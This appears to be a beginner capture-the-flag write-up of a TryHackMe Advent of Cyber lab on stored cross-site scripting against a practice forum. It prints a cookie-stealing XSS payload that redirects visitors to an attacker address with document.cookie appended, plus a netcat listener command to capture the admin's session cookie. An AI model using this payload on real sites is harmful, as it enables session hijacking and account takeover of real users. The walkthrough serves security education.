TryHackMe: Advent of Cyber [Day 18] Elf JS

Room: Advent of Cyber

Difficulty: Beginner

“McSkidy knows the crisis isn’t over. The best thing to do at this point is OSINT.

We need to learn more about the Christmas monster!

During their OSINT, they came across a Hacker Forum. Their research has shown them that this forum belongs to the Christmas Monster. Can they gain access to the admin section of the forum? They haven’t made an account yet, so make sure to register.

Access the machine at http://[your-ip-address]:3000it may take a few minutes to deploy.”

For this challenge you will have to deploy the VM from the question and then use either OpenVPN or the THM virtual Kali Machine (if you are a subscriber) to connect to it. If you need instructions for how to do that, click HERE.

Question #1 What is the admin’s authid cookie value?

Let’s start by heading over to that web forum mentioned, the Hacker Forum.

http://<target machine ip>:3000

Up at the top left, there is a link so that you can register for a new account. After you do that, you’ll want to log in.

It’s interesting that John has mentioned the admin swings by periodically. We will probably be able to use that to our advantage.

You can also see that there is a comment box at the bottom where you can add updates for your fellow Hacker buddies. In our case, we are going to use it to try some XSS.

First, let’s use the harmless example provided in the source material to see if that comment box is indeed vulnerable. After right-clicking on the page and choosing “Inspect Element”, navigate to the console (the test script we use will send output there):

Enter the following script into the forum comment box and then hit submit:


You should now see that it has listed our location as planned, which means that XSS will work!

If you check out the source code on the page now, you can see where our script was added:

You can also see that we made a comment, but it is blank, so this wasn’t exactly stealthy:

Since we know that the admin is going to come along soon to check on things, we can utilize XSS to steal his cookies so we can do whatever we want with them…

Let’s move on to something more nefarious. In that same comment box, try this:

<script>window.location = ‘http://<your ip>:4242/page?param=’ + document.cookie </script>

Again, this is not stealthy. It will redirect any logins so that the session cookie can be captured, causing the entire forum to be out-of-service. It should be fairly obvious what is happening to the system admin when they first log in.

After that, open up a terminal execute the following command:

nc -lnvp 4242

If you are not logged in as root, you might need to use:

sudo nc -lnvp 4242

This is where you will use netcat to listen for the traffic we are about to redirect, on port 4242 (a random port I picked).

-l for listen, -v for verbose, -n means not to resolve hostnames via DNS , -p for the port we want.

Wait around a little bit and the admin will eventually log in!

Happy Hacking! ❤



CTF Writeups to facilitate cyber education.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store